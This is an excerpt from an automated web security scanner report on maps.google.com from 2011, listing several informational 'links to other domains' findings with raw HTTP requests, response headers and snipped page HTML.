Connection: close

<!DOCTYPE html><html xmlns:v="urn:schemas-microsoft-com:vml" class=""><head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=EmulateI
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl=en&sa=N&tab=l1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<span><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" title="Google Maps Labs" id="ml_flask_img" class="flask"/> <span id="ml_flask_msg">
...[SNIP]...
<td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="280" height="1" alt=""/> </td> <td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="220" height="1" alt=""/> </td>
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="panel-bar-divider bar-divider"/> </span>
...[SNIP]...
<a style="display:none" jsdisplay="topbar_config.show_lbc_badge" jsvalues="href: topbar_config.lbc_badge_url"> <img src="http://maps.gstatic.com/mapfiles/placepage/checkmark_13x14.gif" alt=""/> <span msgid="13425" class="link-text">
...[SNIP]...
<a style="display:" jsvalues="style.display: topbar_config.show_panel_toggler ? '' : 'none';" id="paneltoggle2" href="javascript:void(0)" log="paneltgl"> <img title="Hide panel" useattr="title:#msg_hide_panel" id="panelarrow2" src="http://maps.gstatic.com/mapfiles/transparent.png" class="collapse-left3"/> </a> <a style="display:none" href="" jsvalues="style.display: topbar_config.show_return_arrow ? '' : 'none'; href: topbar_config.return_arrow_url" id="return-to-mapview" onclick="return loadUrl(this.href)"> <img title="Map View" useattr="title:#msg_map_view" src="http://maps.gstatic.com/mapfiles/transparent.png" class="collapse-left3"/> </a>
...[SNIP]...
<a href="javascript:void(0)" id="view_rss_link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon view-as-rss"/> <span msgid="11196" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span>
...[SNIP]...
<a href="javascript:void(0)" id="view_kml_link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon view-as-kml"/> <span msgid="11754" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span> <a style="display:none" href="javascript:void(0)" id="mapmaker-link" jsaction="rmi.open-mapmaker"> <img class="bar-icon" src="http://maps.gstatic.com/mapfiles/gw_link.png"/> <span msgid="13326" class="link-text">
...[SNIP]...
</a> <img style="display:none" id="mapmaker-link-sep" src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="javascript:void(0);" jsaction="print.show" id="print"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-print2"/> <span msgid="10044" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a id="showsendtox" href="javascript:void(0);" jsaction="stx.show"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-email2"/> <span msgid="11023" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="javascript:void(0);" jsaction="link.show" id="link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-link2"/> <span msgid="12145" class="link-text">
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> <div style="width:20px" id="pan_up_inline" jsaction="flmc.selectPanUp" class="flmcpanup clickable">
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img id="zoom_out_inline_img" class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img style="width:103px" class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</span> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="mv-dropdown"/> </div>
...[SNIP]...
<div id="overview-toggle"><img id="overview-toggle-image" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png" jsaction="overview.toggle"/> </div>
...[SNIP]...
<a id="d_close" href="javascript:void(0)" jsaction="llm.close" jstrack="1"> <img class="launch_close" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
<div style="visibility:" class="dir-tm" id="travel_modes_div"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="dir-tm-sides"/><a jsselect="travelModes" jsvalues=".tm:$this" href="javascript:void(0)" tabindex="3" jsaction="tm.click"><img jsvalues="id:'dir_' + $this + '_btn';title:$modeMsgs[$this];className:'dir-tm-' + $this + '-unselected' +' dir-tm-btn' + ($index != 0 ? ' dir-tm-btn-side-border':'')" src="http://maps.gstatic.com/mapfiles/transparent.png" width="37" height="23"/></a><img class="dir-tm-sides" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </div>
...[SNIP]...

20.95. http://maps.google.com/maps

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The page was loaded from a URL containing a query string:
  • http://maps.google.com/maps?file\u003dgoogleapi
The response contains the following links to other domains:
  • http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png
  • http://maps.gstatic.com/mapfiles/gw_link.png
  • http://maps.gstatic.com/mapfiles/mapcontrols3d5.png
  • http://maps.gstatic.com/mapfiles/placepage/checkmark_13x14.gif
  • http://maps.gstatic.com/mapfiles/transparent.png
  • http://www.youtube.com/results?file%5Cu003dgoogleapi=&sa=N&hl=en&tab=l1

Request

GET /maps?file\u003dgoogleapi HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:41:10 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=d3768da13d4a5abd:TM=1295908870:LM=1295908870:S=fZYb4_H8HXgQCMne; expires=Wed, 23-Jan-2013 22:41:10 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html xmlns:v="urn:schemas-microsoft-com:vml" class=""><head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=EmulateI
...[SNIP]...
</div><a href="http://www.youtube.com/results?file%5Cu003dgoogleapi=&sa=N&hl=en&tab=l1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<span><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" title="Google Maps Labs" id="ml_flask_img" class="flask"/> <span id="ml_flask_msg">
...[SNIP]...
<td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="280" height="1" alt=""/> </td> <td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="220" height="1" alt=""/> </td>
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="panel-bar-divider bar-divider"/> </span>
...[SNIP]...
<a style="display:none" jsdisplay="topbar_config.show_lbc_badge" jsvalues="href: topbar_config.lbc_badge_url"> <img src="http://maps.gstatic.com/mapfiles/placepage/checkmark_13x14.gif" alt=""/> <span msgid="13425" class="link-text">
...[SNIP]...
<a style="display:" jsvalues="style.display: topbar_config.show_panel_toggler ? '' : 'none';" id="paneltoggle2" href="javascript:void(0)" log="paneltgl"> <img title="Hide panel" useattr="title:#msg_hide_panel" id="panelarrow2" src="http://maps.gstatic.com/mapfiles/transparent.png" class="collapse-left3"/> </a> <a style="display:none" href="" jsvalues="style.display: topbar_config.show_return_arrow ? '' : 'none'; href: topbar_config.return_arrow_url" id="return-to-mapview" onclick="return loadUrl(this.href)"> <img title="Map View" useattr="title:#msg_map_view" src="http://maps.gstatic.com/mapfiles/transparent.png" class="collapse-left3"/> </a>
...[SNIP]...
<a href="javascript:void(0)" id="view_rss_link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon view-as-rss"/> <span msgid="11196" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span>
...[SNIP]...
<a href="javascript:void(0)" id="view_kml_link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon view-as-kml"/> <span msgid="11754" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span> <a style="display:none" href="javascript:void(0)" id="mapmaker-link" jsaction="rmi.open-mapmaker"> <img class="bar-icon" src="http://maps.gstatic.com/mapfiles/gw_link.png"/> <span msgid="13326" class="link-text">
...[SNIP]...
</a> <img style="display:none" id="mapmaker-link-sep" src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="javascript:void(0);" jsaction="print.show" id="print"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-print2"/> <span msgid="10044" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a id="showsendtox" href="javascript:void(0);" jsaction="stx.show"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-email2"/> <span msgid="11023" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="javascript:void(0);" jsaction="link.show" id="link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-link2"/> <span msgid="12145" class="link-text">
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> <div style="width:20px" id="pan_up_inline" jsaction="flmc.selectPanUp" class="flmcpanup clickable">
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img id="zoom_out_inline_img" class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img style="width:103px" class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</span> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="mv-dropdown"/> </div>
...[SNIP]...
<div id="overview-toggle"><img id="overview-toggle-image" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png" jsaction="overview.toggle"/> </div>
...[SNIP]...
<a id="d_close" href="javascript:void(0)" jsaction="llm.close" jstrack="1"> <img class="launch_close" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
<div style="visibility:" class="dir-tm" id="travel_modes_div"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="dir-tm-sides"/><a jsselect="travelModes" jsvalues=".tm:$this" href="javascript:void(0)" tabindex="3" jsaction="tm.click"><img jsvalues="id:'dir_' + $this + '_btn';title:$modeMsgs[$this];className:'dir-tm-' + $this + '-unselected' +' dir-tm-btn' + ($index != 0 ? ' dir-tm-btn-side-border':'')" src="http://maps.gstatic.com/mapfiles/transparent.png" width="37" height="23"/></a><img class="dir-tm-sides" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </div>
...[SNIP]...

20.96. http://maps.google.com/maps

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The page was loaded from a URL containing a query string:
  • http://maps.google.com/maps?hl\x3den\x26tab\x3dwl\x22
The response contains the following links to other domains:
  • http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png
  • http://maps.gstatic.com/mapfiles/gw_link.png
  • http://maps.gstatic.com/mapfiles/mapcontrols3d5.png
  • http://maps.gstatic.com/mapfiles/placepage/checkmark_13x14.gif
  • http://maps.gstatic.com/mapfiles/transparent.png
  • http://www.youtube.com/results?hl%5Cx3den%5Cx26tab%5Cx3dwl%5Cx22=&sa=N&hl=en&tab=l1

Request

GET /maps?hl\x3den\x26tab\x3dwl\x22 HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:40:58 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=8bb52a6aea79b40b:TM=1295908858:LM=1295908858:S=57xglHgOlUz3PTrb; expires=Wed, 23-Jan-2013 22:40:58 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html xmlns:v="urn:schemas-microsoft-com:vml" class=""><head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=EmulateI
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl%5Cx3den%5Cx26tab%5Cx3dwl%5Cx22=&sa=N&hl=en&tab=l1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<span><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" title="Google Maps Labs" id="ml_flask_img" class="flask"/> <span id="ml_flask_msg">
...[SNIP]...
<td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="280" height="1" alt=""/> </td> <td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="220" height="1" alt=""/> </td>
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="panel-bar-divider bar-divider"/> </span>
...[SNIP]...
<a style="display:none" jsdisplay="topbar_config.show_lbc_badge" jsvalues="href: topbar_config.lbc_badge_url"> <img src="http://maps.gstatic.com/mapfiles/placepage/checkmark_13x14.gif" alt=""/> <span msgid="13425" class="link-text">
...[SNIP]...
<a style="display:" jsvalues="style.display: topbar_config.show_panel_toggler ? '' : 'none';" id="paneltoggle2" href="javascript:void(0)" log="paneltgl"> <img title="Hide panel" useattr="title:#msg_hide_panel" id="panelarrow2" src="http://maps.gstatic.com/mapfiles/transparent.png" class="collapse-left3"/> </a> <a style="display:none" href="" jsvalues="style.display: topbar_config.show_return_arrow ? '' : 'none'; href: topbar_config.return_arrow_url" id="return-to-mapview" onclick="return loadUrl(this.href)"> <img title="Map View" useattr="title:#msg_map_view" src="http://maps.gstatic.com/mapfiles/transparent.png" class="collapse-left3"/> </a>
...[SNIP]...
<a href="javascript:void(0)" id="view_rss_link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon view-as-rss"/> <span msgid="11196" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span>
...[SNIP]...
<a href="javascript:void(0)" id="view_kml_link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon view-as-kml"/> <span msgid="11754" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span> <a style="display:none" href="javascript:void(0)" id="mapmaker-link" jsaction="rmi.open-mapmaker"> <img class="bar-icon" src="http://maps.gstatic.com/mapfiles/gw_link.png"/> <span msgid="13326" class="link-text">
...[SNIP]...
</a> <img style="display:none" id="mapmaker-link-sep" src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="javascript:void(0);" jsaction="print.show" id="print"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-print2"/> <span msgid="10044" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a id="showsendtox" href="javascript:void(0);" jsaction="stx.show"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-email2"/> <span msgid="11023" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="javascript:void(0);" jsaction="link.show" id="link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-link2"/> <span msgid="12145" class="link-text">
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> <div style="width:20px" id="pan_up_inline" jsaction="flmc.selectPanUp" class="flmcpanup clickable">
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img id="zoom_out_inline_img" class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img style="width:103px" class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</span> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="mv-dropdown"/> </div>
...[SNIP]...
<div id="overview-toggle"><img id="overview-toggle-image" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png" jsaction="overview.toggle"/> </div>
...[SNIP]...
<a id="d_close" href="javascript:void(0)" jsaction="llm.close" jstrack="1"> <img class="launch_close" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
<div style="visibility:" class="dir-tm" id="travel_modes_div"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="dir-tm-sides"/><a jsselect="travelModes" jsvalues=".tm:$this" href="javascript:void(0)" tabindex="3" jsaction="tm.click"><img jsvalues="id:'dir_' + $this + '_btn';title:$modeMsgs[$this];className:'dir-tm-' + $this + '-unselected' +' dir-tm-btn' + ($index != 0 ? ' dir-tm-btn-side-border':'')" src="http://maps.gstatic.com/mapfiles/transparent.png" width="37" height="23"/></a><img class="dir-tm-sides" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </div>
...[SNIP]...

20.97. http://maps.google.com/maps

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The page was loaded from a URL containing a query string:
  • http://maps.google.com/maps?hl\\x3den\\x26amp;um\\x3d1\\x26amp;ie\\x3dUTF-8\\x26amp;q\\x3daub\\x26amp;fb\\x3d1\\x26amp;gl\\x3dus\\x26amp;hq\\x3daub\\x26amp;cid\\x3d0,0,7028149978956142856\\x26amp;ei\\x3diJI9TZL9IMb_lgeur7DXBg\\x26amp;sa\\x3dX\\x26amp;oi\\x3dlocal_result\\x26amp;ct\\x3dimage\\x26amp;resnum\\x3d5\\x26amp;ved\\x3d0CEUQnwIwBA\\x22\\x3e\\x3cimg
The response contains the following links to other domains:
  • http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png
  • http://maps.gstatic.com/mapfiles/gw_link.png
  • http://maps.gstatic.com/mapfiles/mapcontrols3d5.png
  • http://maps.gstatic.com/mapfiles/placepage/checkmark_13x14.gif
  • http://maps.gstatic.com/mapfiles/transparent.png
  • http://www.youtube.com/results?hl%5C%5Cx3den%5C%5Cx26amp%3Bum%5C%5Cx3d1%5C%5Cx26amp%3Bie%5C%5Cx3dUTF-8%5C%5Cx26amp%3Bq%5C%5Cx3daub%5C%5Cx26amp%3Bfb%5C%5Cx3d1%5C%5Cx26amp%3Bgl%5C%5Cx3dus%5C%5Cx26amp%3Bhq%5C%5Cx3daub%5C%5Cx26amp%3Bcid%5C%5Cx3d0,0,7028149978956142856%5C%5Cx26amp%3Bei%5C%5Cx3diJI9TZL9IMb_lgeur7DXBg%5C%5Cx26amp%3Bsa%5C%5Cx3dX%5C%5Cx26amp%3Boi%5C%5Cx3dlocal_result%5C%5Cx26amp%3Bct%5C%5Cx3dimage%5C%5Cx26amp%3Bresnum%5C%5Cx3d5%5C%5Cx26amp%3Bved%5C%5Cx3d0CEUQnwIwBA%5C%5Cx22%5C%5Cx3e%5C%5Cx3cimg=&sa=N&hl=en&tab=l1

Request

GET /maps?hl\\x3den\\x26amp;um\\x3d1\\x26amp;ie\\x3dUTF-8\\x26amp;q\\x3daub\\x26amp;fb\\x3d1\\x26amp;gl\\x3dus\\x26amp;hq\\x3daub\\x26amp;cid\\x3d0,0,7028149978956142856\\x26amp;ei\\x3diJI9TZL9IMb_lgeur7DXBg\\x26amp;sa\\x3dX\\x26amp;oi\\x3dlocal_result\\x26amp;ct\\x3dimage\\x26amp;resnum\\x3d5\\x26amp;ved\\x3d0CEUQnwIwBA\\x22\\x3e\\x3cimg HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:41:01 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=6519d73cebd025c1:TM=1295908861:LM=1295908861:S=FXx88J_feOyYabSV; expires=Wed, 23-Jan-2013 22:41:01 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html xmlns:v="urn:schemas-microsoft-com:vml" class=""><head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=EmulateI
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl%5C%5Cx3den%5C%5Cx26amp%3Bum%5C%5Cx3d1%5C%5Cx26amp%3Bie%5C%5Cx3dUTF-8%5C%5Cx26amp%3Bq%5C%5Cx3daub%5C%5Cx26amp%3Bfb%5C%5Cx3d1%5C%5Cx26amp%3Bgl%5C%5Cx3dus%5C%5Cx26amp%3Bhq%5C%5Cx3daub%5C%5Cx26amp%3Bcid%5C%5Cx3d0,0,7028149978956142856%5C%5Cx26amp%3Bei%5C%5Cx3diJI9TZL9IMb_lgeur7DXBg%5C%5Cx26amp%3Bsa%5C%5Cx3dX%5C%5Cx26amp%3Boi%5C%5Cx3dlocal_result%5C%5Cx26amp%3Bct%5C%5Cx3dimage%5C%5Cx26amp%3Bresnum%5C%5Cx3d5%5C%5Cx26amp%3Bved%5C%5Cx3d0CEUQnwIwBA%5C%5Cx22%5C%5Cx3e%5C%5Cx3cimg=&sa=N&hl=en&tab=l1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<span><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" title="Google Maps Labs" id="ml_flask_img" class="flask"/> <span id="ml_flask_msg">
...[SNIP]...
<td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="280" height="1" alt=""/> </td> <td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="220" height="1" alt=""/> </td>
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="panel-bar-divider bar-divider"/> </span>
...[SNIP]...
<a style="display:none" jsdisplay="topbar_config.show_lbc_badge" jsvalues="href: topbar_config.lbc_badge_url"> <img src="http://maps.gstatic.com/mapfiles/placepage/checkmark_13x14.gif" alt=""/> <span msgid="13425" class="link-text">
...[SNIP]...
<a style="display:" jsvalues="style.display: topbar_config.show_panel_toggler ? '' : 'none';" id="paneltoggle2" href="javascript:void(0)" log="paneltgl"> <img title="Hide panel" useattr="title:#msg_hide_panel" id="panelarrow2" src="http://maps.gstatic.com/mapfiles/transparent.png" class="collapse-left3"/> </a> <a style="display:none" href="" jsvalues="style.display: topbar_config.show_return_arrow ? '' : 'none'; href: topbar_config.return_arrow_url" id="return-to-mapview" onclick="return loadUrl(this.href)"> <img title="Map View" useattr="title:#msg_map_view" src="http://maps.gstatic.com/mapfiles/transparent.png" class="collapse-left3"/> </a>
...[SNIP]...
<a href="javascript:void(0)" id="view_rss_link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon view-as-rss"/> <span msgid="11196" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span>
...[SNIP]...
<a href="javascript:void(0)" id="view_kml_link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon view-as-kml"/> <span msgid="11754" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span> <a style="display:none" href="javascript:void(0)" id="mapmaker-link" jsaction="rmi.open-mapmaker"> <img class="bar-icon" src="http://maps.gstatic.com/mapfiles/gw_link.png"/> <span msgid="13326" class="link-text">
...[SNIP]...
</a> <img style="display:none" id="mapmaker-link-sep" src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="javascript:void(0);" jsaction="print.show" id="print"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-print2"/> <span msgid="10044" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a id="showsendtox" href="javascript:void(0);" jsaction="stx.show"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-email2"/> <span msgid="11023" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="javascript:void(0);" jsaction="link.show" id="link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-link2"/> <span msgid="12145" class="link-text">
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> <div style="width:20px" id="pan_up_inline" jsaction="flmc.selectPanUp" class="flmcpanup clickable">
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img id="zoom_out_inline_img" class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
